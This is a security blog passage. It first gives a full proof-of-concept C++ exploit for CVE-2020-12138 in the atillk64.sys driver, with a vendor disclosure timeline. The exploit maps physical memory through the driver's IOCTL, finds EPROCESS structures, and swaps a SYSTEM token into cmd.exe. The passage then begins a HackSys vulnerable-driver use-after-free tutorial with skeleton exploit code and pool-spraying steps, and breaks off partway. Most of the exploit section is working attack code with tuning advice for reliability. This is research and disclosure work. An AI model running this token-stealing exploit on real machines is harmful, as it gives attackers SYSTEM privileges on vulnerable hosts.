PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

So we can see that from the address that would normally be given to us if we did a !poolfind search for “Proc”, it is

0x2e8 to the UniqueProcessId,
0x360 to the Token, and
0x450 to the ImageFileName.

So in our minds right now, our allocations look like this (thanks to ReWolf for breaking this down so well):

POOL_HEADER structure (this is where our tag will reside),
OBJECT_HEADER_xxx_INFO structures,
OBJECT_HEADER which, contains a Body where the EPROCESS structure lives.

The problem I found was that process to process, the size of these structures in between our “Proc” address and the point where our EPROCESS structure begins was wildly varied. Sometimes they were 0x20 in size, sometimes up to 0x90 during my testing. So right now my understanding of these allocations looks something like this:

if <0x10-aligned address> + 0x4 == "Proc"

then <0x10-aligned address> + <some intermediate structure size(somewhere between 0x20 and 0x90 typically)> == <beginning of EPROCESS>

then <beginning of EPROCESS> + 0x2e8 == UniqueProcessId
then <beginning of EPROCESS> + 0x360 == Token
then <beginning of EPROCESS> + 0x450 == ImageFileName

So my code had to account for these varying, let’s just call them “headers” informally for now, sizes. I noticed that all of these “header” structures ended with a 4-byte marker value of 0x00B80003. So what my code would now do is,

find “Proc” by looking at 0x10-aligned addresses and looking at the 4-byte value at +0x4,
once found, iterate 0x10 at a time up to offset 0xA0 (since the largest header size I found was 0x90) looking for 0x00B80003,
take the location of “Proc” and add it to a vector,
take the offset to 0x00B80003 and add it to a vector since we need to know this “header” size to calculate our way to the EPROCESS members we’re interested in.

So now that we have both the location of a “Proc” and the size of the header, we can accurately get UniqueProcessId, Token, and ImageFileName values.

(“Proc” - 0x4) + header-size + 0x2e8 = UniqueProcessId,
(“Proc” - 0x4) + header-size + 0x360 = Token,
(“Proc” - 0x4) + header-size + 0x450 = UniqueProcessId.

As an example, take this “Proc” tag found by !poolfind:

FFFFD48C`B102D320  00 00 B8 02 50 72 6F 63 39 B0 0D A6 8C D4 FF FF  ....Proc9.......
FFFFD48C`B102D330  00 10 00 00 88 0A 00 00 48 00 00 00 FF E8 2E F6  ........H.......
FFFFD48C`B102D340  C0 D4 66 2F 05 F8 FF FF 24 F6 FF FF E8 1F F6 FF  ..f/....$.......
FFFFD48C`B102D350  4A 7F 03 00 00 00 00 00 07 00 00 00 00 00 00 00  J...............
FFFFD48C`B102D360  00 00 00 00 00 00 00 00 93 00 08 00 F6 FF FF E8  ................
FFFFD48C`B102D370  C0 D4 66 2F 05 F8 FF FF 6B 85 EE 27 0F E6 FF FF  ..f/....k..'....
FFFFD48C`B102D380  03 00 B8 00 00 00 00 00 A0 04 0D A2 8C D4 FF FF  ................

We can see that 0xFFFFD48CB102D320 - 0x4 is “Proc”. Our header marker 0x00B80003, denoting when the header ends, is at offset 0x60 from there. We can test that we can find the ImageFileName given this information as follows:

kd> da 0xFFFFD48CB102D320 + 0x60 + 0x450
ffffd48c`b102d7d0  "svchost.exe"

So this looks promising.

Implementing Strategy in Code

One difficulty I faced on my Windows 10 build was that mapping large chunks at a time with DeviceIoControl calling our driver routine would often result in crashes. I didn’t have this problem at all on Windows 7. In my Windows 7 exploit I was able to map a 0x4CCCCCCC byte chunk and parse through the entire thing looking for the values I was after.

On Windows 10, I found the most stable approach to be to map 0x1000 (small page-sized) chunks at a time and then parse through these mapped chunks for my values. If I didn’t find my values, I would map another 0x1000. This too wasn’t crash free. I found that if I made too many mappings I would also crash so I had to find a sweet spot.

I also found that some calls to the driver routine with DeviceIoControl would return a failure. I wasn’t able to completely figure this out but my suspicion is that since our CacheType is hardcoded for us with MmMapIoSpace, if we tried to map pages that had been given a different CacheType in a previous mapping to a virtual address, it would fail. (Does this make sense?)

Picking a physical address to start mapping from is kind of arbitrary but I found the sweet spot on my Windows 10 VM to be around 0x200000000. This VM has about 8 GB of RAM. To limit the amount of mappings, I set a hard cap at 0x240000000 so that my exploit would stop mapping once it hit this address. I also toyed around with adding a limit to the amount of times DeviceIoControl is called but the exploit seems stable enough in testing that this wasn’t necessary in the end.

I used two main functions, the first function maps memory iteratively looking to identify the physical addresses of of “Proc” tags that have our “header marker” value soon after. This function stores the address of each physical location, the size of the header offset, and the size of the offset from the beginning of the memory page to the “Proc” location. It stores all of these values in vectors which are the sole members of a struct which the function returns. The offset to the beginning of the page is simply calculated with a modulus operation and then the remainder is subtracted from the “Proc” location. I wanted to make sure I was always mapping from a nice 0x1000 aligned address. Here is some of that snipped code:

cout << "[>] Going fishing for 100 \"Proc\" chunks in RAM...\n\n";
    while (proc_count < 100)
    {
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = START_ADDRESS + (0x1000 * iteration);

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        if (input_buff.start_address > MAX_ADDRESS)
        {
            cout << "[!] Max address reached!\n";
            cout << "[!] Iterations: " << dec << iteration << "\n";
            exit(1);
        }
        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // The virtual address in our process space where RAM was mapped
            // is located in the first 8 bytes of our output_buff.
            INT64 mapped_address = *(PINT64)output_buff;

            // We will read a 32 bit value at offset i + 0x100 at some point
            // when looking for 0x00B80003, so we can't iterate any further
            // than offset 0xF00 here or we'll get an access violation.
            for (INT64 i = 0; i < (0xF10); i = i + 0x10)
            {
                INT64 test_address = mapped_address + i;
                INT32 test_value = *(PINT32)(test_address + 0x4);
                if (test_value == 0x636f7250)   // "Proc"
                {
                    for (INT64 x = 0; x < (0x100); x = x + 0x10)
                    {
                        INT64 header_address = test_address + x;
                        INT32 header_value = *(PINT32)header_address;
                        if (header_value == 0x00B80003) //  "Header" ending
                        {
                            // We found a "header", this is a legit "Proc"
                            proc_count++;

                            // This is the literal physical mem addr for the
                            // "Proc" pool tag
                            INT64 temp_addr = input_buff.start_address + i;
                            
                            // This address might not be page-aligned to 0x1000
                            // so find out how far off from a multiple of 
                            // 0x1000 we are. This value is stored in our 
                            // PROC_DATA struct in the page_entry_offset
                            // member.
                            INT64 modulus = temp_addr % 0x1000;
                            proc_data.page_entry_offset.push_back(modulus);
                            
                            // This is the page-aligned address where, either
                            // small or large paged memory will hold our "Proc"
                            // chunk. We store this as our proc_address member
                            // in PROC_DATA.
                            INT64 page_address = temp_addr - modulus;
                            proc_data.proc_address.push_back(
                                page_address);
                            proc_data.header_size.push_back(x);
                        }
                    }
                }
            }
            iteration++;
        }
        else
        {
            // DeviceIoControl failed
            iteration++;
            failures++;
        }
    }
    cout << "[>] \"Proc\" chunks found\n";
    cout << "    - Failed DeviceIoControl calls: " << dec << failures << "\n";
    cout << "    - Total DeviceIoControl calls: " << dec << iteration << "\n\n";

    // Returns struct of two vectors, one holds Proc chunk address
    // one holds header-size for that Proc chunk.
    return proc_data;

The next function takes the returned proc_data struct and re-maps 0x1000 bytes of physical memory starting at the physical memory address of the “Proc” tag (-0x4) but from the beginning of that page. The largest header length I found being 0x90, and the largest offset of interest being 0x450, we definitely don’t need to map this much from this address but I found that mapping anything less would sporadically lead to crashes as it wouldn’t be perfectly page-aligned.

The function knows the “Proc” tag location, the header size, and the offsets for valuable EPROCESS members and goes looking for any likely to be SYSTEM process as defined in a global vector.

vector<INT64> SYSTEM_procs = {
    0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    0x6578652e73736d73,         // smss.exe
    0x7365636976726573,         // services.exe
    0x6b6f72426d726753,         // SgrmBroker.exe
    0x2e76736c6f6f7073,         // spoolsv.exe
    0x6e6f676f6c6e6977,         // winlogon.exe
    0x2e74696e696e6977,         // wininit.exe
    0x6578652e736d6c77,         // wlms.exe
};

If it finds one of these processes and our cmd.exe process it will overwrite the cmd.exe Token with the Token value of a privileged process giving us an nt authority\system shell.

INT64 SYSTEM_token = 0;
    INT64 cmd_token_addr = 0;
    bool SYSTEM_found = false;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.proc_address.size(); i++)
    {
        // We need to map 0x1000 bytes from our "Proc" tag so that we can parse
        // out all the EPROCESS members we're interested in. The deepest member
        // is ImageFileName at offset 0x450 from the end of the header. Header
        // sizes varied from 0x20 to 0x90 in my testing. start_address will be
        // the address of the beginning of each 0x1000 aligned address closest
        // to the "Proc" tag we found.
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = proc_data.proc_address[i];

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        DWORD bytes_returned = 0;

        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // Pointer to the beginning of our process space with the mapped
            // 0x1000 bytes of physmem
            INT64 mapped_address = *(PINT64)output_buff;

            // mapped_address is mapping from our page entry where, on that
            // page, exists a "Proc" tag. Therefore, we need both the header
            // size and the offset from the page entry to the "Proc" tag so
            // we can calculate the static offsets/values of the EPROCESS
            // memebers ImageFileName, Token, UniqueProcessId...
            INT64 imagename_address = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x450; //ImageFileName
            INT64 imagename_value = *(PINT64)imagename_address;

            INT64 proc_token_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i] 
                + 0x360; //Token
            INT64 proc_token = *(PINT64)proc_token_addr;

            INT64 pid_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i] 
                + 0x2e8; //UniqueProcessId
            INT64 pid_value = *(PINT64)pid_addr;

            // See if the ImageFileName 64 bit hex value is in our vector of
            // common SYSTEM processes
            int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
                imagename_value);
            if (sys_result != 0 and SYSTEM_found == false)
            {
                SYSTEM_token = proc_token;
                cout << "[>] SYSTEM process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
                SYSTEM_found = true;
            }
            else if (imagename_value == 0x6568737265776f70 or
                imagename_value == 0x6578652e646d63)  // powershell or cmd
            {
                cmd_token_addr = proc_token_addr;
                cout << "[>] cmd.exe process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
            }
        }
        else
        {
            //DeviceIoControl failed
        }
    }
    if ((!cmd_token_addr) or (!SYSTEM_token))
    {
        cout << "[!] Token swapping requirements not met.\n";
        cout << "[!] Last physical address scanned: " << hex <<
            proc_data.proc_address.back() << ".\n";
        cout << "[!] Better luck next time!\n";
        exit(1);
    }
    else
    {
        *(PINT64)cmd_token_addr = SYSTEM_token;
        cout << "[>] SYSTEM and cmd.exe token info found, swapping tokens...\n";
        exit(0);
    }
}

As you can see, if we don’t find both a SYSTEM process and our cmd.exe process, the program exits without doing anything. This wasn’t often the case whenever the test machine was left running for at least 2-3 minutes after booting.

Searching for 100 process allocations in the pool is somewhat aggressive. The program will exit if it doesn’t find this many before bumping into the hard cap. Keep in mind that it doesn’t start parsing for the EPROCESS data until it has collected 100 “Proc” tag locations. This could mean that the program exits having already identified the relevant process chunks needed to elevate privileges.

This number can be toned down and the exploit could be trivially tweaked to search very small sections of physical memory at a time before exiting, annotating along the way and printing any valuable EPROCESS structure information to the terminal as it progresses. It could for instance be tweaked to search n amount of physical memory, output the location and token values of any privileged process or the cmd.exe process, and then exit while specifying the last memory address that it mapped. You could then start the exploit up again but this time specify the new last memory address mapped and map n from there and repeat until you had everything you needed.

The hardest part was finding the cmd.exe process. Likely-to-be-SYSTEM processes were easy to find. If you have a remote-desktop/GUI equivalent access to the host machine, you could open a few cmd.exe processes and greatly improve your odds of finding one to overwrite and elevate privileges.

Even with just one cmd.exe process, I was able to find and overwrite my token roughly 90% of the time. With more than one, it was 100% in my testing.

There are some improvements that can be made to the exploit no doubt, but as is, it works really well in my testing and can be tweaked fairly easily. I believe it sufficiently proves the vulnerability.

Mandatory screenshot:

Huge Thanks

Huge thanks to @FuzzySecurity for all of the tutorials, I’ve recently also finished up his HEVD exploit tutorials and have learned a ton from his blog. Just an awesome resource.

Thanks to @HackSysTeam for the HackSysExtremeVulnerable driver, it has been such a great learning resource and got me started down this path.

Thanks to both @ihack4falafel and @ilove2pwn_ for answering all of my questions along the way or helping me find the answers myself. Very grateful.

Thanks to @TheColonial for his advice about disclosure and his awesome CAPCOM.SYS YouTube video series. I learned a lot of nice WinDBG tricks from this.

Thanks again to @jessemichael for being so helpful and charitable.

Thanks to Jackson T. for not only his blog post but for answering all my questions and being extremely helpful, really appreciate it.

And finally thanks to all those cited blog authors @rwfpl and @hatRiot.

All testing performed on Build 18362.19h1_release.190318-1202.

Please, let me know if you find any errors.

Disclosure Timeline

February 25th 2020 – Email, Customer Service Ticket, and Twitter DM sent to GIGABYTE USA
February 26th 2020 – Email to AMD [email protected] notification of vulnerability found and PoC created
February 26th 2020 – Response from psirt to send PoC
February 26th 2020 – PoC sent to psirt
March 7th 2020 – Ask for update from psirt, no update given
March 16th 2020 – Ask for update from psirt
March 16th 2020 – psirt responds that the issue has been previously reported and that they don’t support the product as a result
March 16th 2020 – I inform psirt that other parties are still packaging and installing the driver and there is no advisory for the driver
March 24th 2020 – psirt states that support for the driver ended in late 2019 and to contact GIGABYTE directly
April 14th 2020 – No response from GIGABYTE USA, request CVE
April 24th 2020 – Assigned CVE-2020-12138, blog posted

Exploit Code

// CVE-2020-12138
// EOP Exploit POC for atillk64.sys by @h0mbre_
// C:\Program Files (x86)\GIGABYTE\RGBFusion\AtiTool\atillk64.sys
// Driver vulnerability referenced in: 
// https://github.com/eclypsium/Screwed-Drivers
// https://eclypsium.com/2019/08/10/screwed-drivers-signed-sealed-delivered/

#include <iostream>
#include <vector>
#include <algorithm>
#include <Windows.h>
#include "h0mbre.h"
using namespace std;

#define DEVICE_NAME         "\\\\.\\atillk64"
#define IOCTL               0x9C402564
#define START_ADDRESS       (INT64)0x200000000   // based off testing my VM
#define MAX_ADDRESS         (INT64)0x240000000   // based off testing my VM

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, eg. 'wmlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    0x6578652e73736d73,         // smss.exe
    0x7365636976726573,         // services.exe
    0x6b6f72426d726753,         // SgrmBroker.exe
    0x2e76736c6f6f7073,         // spoolsv.exe
    0x6e6f676f6c6e6977,         // winlogon.exe
    0x2e74696e696e6977,         // wininit.exe
    0x6578652e736d6c77,         // wlms.exe
};

// Creating struct for our input buffer to DeviceIoControl
typedef struct {
    INT64 start_address;
    DWORDLONG num_of_bytes;
    DWORDLONG padding;
} INPUT_BUFFER;

// This struct will hold the address of a "Proc" tag and that Proc chunk's 
// header size
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

// Grabs handle to atillk64.sys
HANDLE get_handle(const char* device_name) {
    HANDLE hFile = CreateFileA(
        device_name,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        cout << "[!] Unable to grab handle to atillk64.sys.\n";
        exit(1);
    }
    else
    {
        string hex_output = pretty_hex((int)hFile);
        cout << "[>] Successfully grabbed handle to atillk64.sys: "
            << hex_output << "\n";

        return hFile;
    }
}

// Mapping memory from a physical address to our process virtual space
PROC_DATA map_memory(HANDLE device_handle) {

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    string hex_output = pretty_hex((int)output_buff);
    cout << "[>] Output buffer allocated at: " << hex_output << ".\n";

    DWORD bytes_returned = 0;

    PROC_DATA proc_data;

    // failures == unsucessful DeviceIoControl calls
    int failures = 0;

    // How many legitamate "Proc" chunks we've found in memory as in
    // we've confirmed they have headers.
    int proc_count = 0;
    int iteration = 0;
    cout << "[>] Going fishing for 100 \"Proc\" chunks in RAM...\n\n";
    while (proc_count < 100)
    {
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = START_ADDRESS + (0x1000 * iteration);

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        if (input_buff.start_address > MAX_ADDRESS)
        {
            cout << "[!] Max address reached!\n";
            cout << "[!] Iterations: " << dec << iteration << "\n";
            exit(1);
        }
        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // The virtual address in our process space where RAM was mapped
            // is located in the first 8 bytes of our output_buff.
            INT64 mapped_address = *(PINT64)output_buff;

            // We will read a 32 bit value at offset i + 0x100 at some point
            // when looking for 0x00B80003, so we can't iterate any further
            // than offset 0xF00 here or we'll get an access violation.
            for (INT64 i = 0; i < (0xF10); i = i + 0x10)
            {
                INT64 test_address = mapped_address + i;
                INT32 test_value = *(PINT32)(test_address + 0x4);
                if (test_value == 0x636f7250)   // "Proc"
                {
                    for (INT64 x = 0; x < (0x100); x = x + 0x10)
                    {
                        INT64 header_address = test_address + x;
                        INT32 header_value = *(PINT32)header_address;
                        if (header_value == 0x00B80003) //  "Header" ending
                        {
                            // We found a "header", this is a legit "Proc"
                            proc_count++;

                            // This is the literal physical mem addr for the
                            // "Proc" pool tag
                            INT64 temp_addr = input_buff.start_address + i;

                            // This address might not be page-aligned to 0x1000
                            // so find out how far off from a multiple of 
                            // 0x1000 we are. This value is stored in our 
                            // PROC_DATA struct in the page_entry_offset
                            // member.
                            INT64 modulus = temp_addr % 0x1000;
                            proc_data.page_entry_offset.push_back(modulus);

                            // This is the page-aligned address where, either
                            // small or large paged memory will hold our "Proc"
                            // chunk. We store this as our proc_address member
                            // in PROC_DATA.
                            INT64 page_address = temp_addr - modulus;
                            proc_data.proc_address.push_back(
                                page_address);
                            proc_data.header_size.push_back(x);
                        }
                    }
                }
            }
            iteration++;
        }
        else
        {
            // DeviceIoControl failed
            iteration++;
            failures++;
        }
    }
    cout << "[>] \"Proc\" chunks found\n";
    cout << "    - Failed DeviceIoControl calls: " << dec << failures << "\n";
    cout << "    - Total DeviceIoControl calls: " << dec << iteration << "\n\n";

    // Returns struct of two vectors, one holds Proc chunk address
    // one holds header-size for that Proc chunk.
    return proc_data;
}

void parse_procs(HANDLE device_handle, struct PROC_DATA proc_data) {

    INT64 SYSTEM_token = 0;
    INT64 cmd_token_addr = 0;
    bool SYSTEM_found = false;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.proc_address.size(); i++)
    {
        // We need to map 0x1000 bytes from our "Proc" tag so that we can parse
        // out all the EPROCESS members we're interested in. The deepest member
        // is ImageFileName at offset 0x450 from the end of the header. Header
        // sizes varied from 0x20 to 0x90 in my testing. start_address will be
        // the address of the beginning of each 0x1000 aligned address closest
        // to the "Proc" tag we found.
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = proc_data.proc_address[i];

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        DWORD bytes_returned = 0;

        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // Pointer to the beginning of our process space with the mapped
            // 0x1000 bytes of physmem
            INT64 mapped_address = *(PINT64)output_buff;

            // mapped_address is mapping from our page entry where, on that
            // page, exists a "Proc" tag. Therefore, we need both the header
            // size and the offset from the page entry to the "Proc" tag so
            // we can calculate the static offsets/values of the EPROCESS
            // memebers ImageFileName, Token, UniqueProcessId...
            INT64 imagename_address = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x450; //ImageFileName
            INT64 imagename_value = *(PINT64)imagename_address;

            INT64 proc_token_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x360; //Token
            INT64 proc_token = *(PINT64)proc_token_addr;

            INT64 pid_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x2e8; //UniqueProcessId
            INT64 pid_value = *(PINT64)pid_addr;

            // See if the ImageFileName 64 bit hex value is in our vector of
            // common SYSTEM processes
            int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
                imagename_value);
            if (sys_result != 0 and SYSTEM_found == false)
            {
                SYSTEM_token = proc_token;
                cout << "[>] SYSTEM process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
                SYSTEM_found = true;
            }
            else if (imagename_value == 0x6568737265776f70 or
                imagename_value == 0x6578652e646d63)  // powershell or cmd
            {
                cmd_token_addr = proc_token_addr;
                cout << "[>] cmd.exe process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
            }
        }
        else
        {
            //DeviceIoControl failed
        }
    }
    if ((!cmd_token_addr) or (!SYSTEM_token))
    {
        cout << "[!] Token swapping requirements not met.\n";
        cout << "[!] Last physical address scanned: " << hex <<
            proc_data.proc_address.back() << ".\n";
        cout << "[!] Better luck next time!\n";
        exit(1);
    }
    else
    {
        *(PINT64)cmd_token_addr = SYSTEM_token;
        cout << "[>] SYSTEM and cmd.exe token info found, swapping tokens...\n";
        exit(0);
    }
}

void ascii() {

    cout << "\n\n\t     CVE-2020-12138 Proof-of-Concept\n";
    cout << "\t   EOP in ATI Technologies atillk64.sys\n\n";
    cout << "\t\t\t       by @h0mbre_\n\n\n";
}

int main() {

    ascii();

    // Grab handle to our device driver atillk64.sys
    HANDLE hFile = get_handle(DEVICE_NAME);

    // Return a pointer to our output buffer
    PROC_DATA proc_data = map_memory(hFile);

    // Look through our PROC_DATA struct for the values we need, ie EPROCESS
    // members for the processes we're interested in
    parse_procs(hFile, proc_data);
}

The Human Machine Interface
HEVD Exploits – Windows 7 x86 Use-After-Freeh0mbre
23 April 2020 at 04:00

HEVD Exploits – Windows 7 x86 Use-After-Free

The Human Machine Interface

By: h0mbre

23 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

how drivers work, the different types, communication between userland, the kernel, and drivers, etc
how to install HEVD,
how to set up a lab environment
shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

To @r0oki7 for their walkthrough,
To @FuzzySec for their walkthrough,

UAF Setup

I’ve never exploited a use-after-free bug on any system before. I vaguely understood the concept before starting this excercise. We need what, in my noob opinion, seems like quite a lot of primitives in order to make this work. Obviously HEVD goes out of its way to be vulnerable in precisely the correct way for us to get an exploit working which is perfect for me since I have no experience with this bug class and we’re just here to learn. I feel like although we have to utilize multiple functions via IOCTL, this is actually a more simple exploit to pull off than the pool overflow that we just did.

Also, I wanted to do this on 64 bit; however, most of the strategies I saw outlined required that we use NtQuerySystemInformation, which as far as I know requires your process to be elevated to an extent so I wanted to avoid that. On 64 bit, the pool header structure size changes from 0x8 bytes to 0x10 bytes which makes exploitation more cumbersome; however, there are some good walkthroughs out there about how to accomplish this. For now, let’s stick to x86.

What do we need in order to exploit a use-after-free bug? Well, it seems like after doing this excercise we need to be able to do the following:

allocate an object in the non-paged pool,
a mechansim that creates a reference to the object as a global variable, ie if our object is allocated at 0xFFFFFFFF, there is some variable out there in the program that is storing that address for later use,
the ability to free the memory and not have the previously established reference NULLed out, ie when the chunk is freed the program author doesn’t specify that the reference=NULL,
the ability to create “fake” objects that have the same size and controllable contents in the non-paged pool,
the ability to spray the non-paged pool and create perfectly sized holes so that our UAF and fake objects can be fitted in our created holes,
finally, the ability to use the no-longer valid reference to our freed chunk.

Allocating the UAF Object in the Pool

Let’s take a look at the UAF object allocation routine in the driver in IDA.

It may not be immediately clear what’s going on without stepping through the routine in the debugger but we actually have very little control over what is taking place here. I’ve created a small skeleton exploit code and set a breakpoint towards the start of the routine. Here is our code at the moment:

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);
}


int main() {

    HANDLE hFile = grab_handle();

    create_UAF_object(hFile);

    return 0;
}

You can see from the IDA screenshot that after the call to ExAllocatePoolWithTag, eax is placed in esi, this is about where I’ve placed the breakpoint, we can then take the value in esi which should be a pointer to our allocation, and go see what the allocation will look like after the subsequent memset operation completes. We can see some static values as well, such as waht appears to be the size of the allocation (0x58), which we know from our last post is actually undersold by 0x8 since we have to account also for the pool header, so our real allocation size in the pool is 0x60 bytes.

So we hit our breakpoint after ExAllocatePoolWithTag and then I just stepped through until the memset completed.

Right after the memset completed, we look up our object in the pool and see that it’s mostly been filled with A characters except for the first DWORD value has been left NULL. After stepping through the next two instructions:

We can see that the DWORD value has been filled and also that a null terminator has been added to the last byte of our allocation. This DWORD is the UaFObjectCallback which is a function pointer for a callback which gets used during a separate routine.

And lastly in the screenshot we can see that move esi, which is the location of our allocation, into the global variable g_UseAfterFreeObject. This is important because this is what makes this code vulnerable as this same variable will not be nulled out when the object is freed.

Freeing the UAF Object

Now, lets try interacting with the driver routine which allows us to free our object.

Not a whole lot here, we can see though that there is no effort made to NULL the global variable g_UserAfterFreeObject. You can see that even after we run the routine, the vairable still holds the value of our freed allocation address:

Allocating a Fake Object

Now let’s see how much freedom we have to allocate arbitrary objects in the non-paged pool. Looking at the function, it uses the same APIs we’re familiar with, does a probe for read to make sure the buffer is in user land (I think?), and then builds our chunk to our specifications.

I just sent a buffer of size 0x58 with all A characters for testing. It even appends a null-terminator to the end like the real UAF object allocator, but we control the contents of this one. This is good since we’ll have full control over the pointer value at prepended to the chunk that serves as the call back function pointer.

Executing UAF Object Callback

This is where the “use” portion of “Use-After-Free” comes in. There is a driver routine that allows us to take the address which holds the callback function pointer of the UAF object and then call the function there. We can see this in IDA.

We can see that as long as the value at [eax], which holds the address of our UAF object (or what used to be our UAF object before we freed it) is not NULL, we’ll go ahead and call the function pointer stored at that location (the callback function). Right now, if we called this, what would happen? Let’s see!

Looking up the memory address of what was our freed chunk we see that it is NOT NULL. We would actually call something, but the address that would be called is 0x852c22f0. Looking at that address, we see that there is just arbitrary code there.

This is not what we want. We want this to be predictable just like our last exploit. We want the freed address of our UAF object to be filled with our fake object, so when the function pointer at that address is called, it will be a pointer we control, our shellcode. To do this, our plan of attack is very similar to our last post. Please go through that exploit first!

Spraying the Non-Paged Pool

First thing is first, we need an object that fits our needs. Last post we used Event Objects, but this time around, since we need 0x60 sized chunks, we’ll be using IoCompletionReserve objects which we can allocate with NtAllocateReserveObject (thanks blogpost authors).

We’ll do the same thing we did last time but spray some more. In my testing I found that I had to spray more to get the chunks sequential like we want:

defragment the pool with 10,000 objects
aim for some sequential/contiguous blocks of objects with another spray of 30,000 objects.

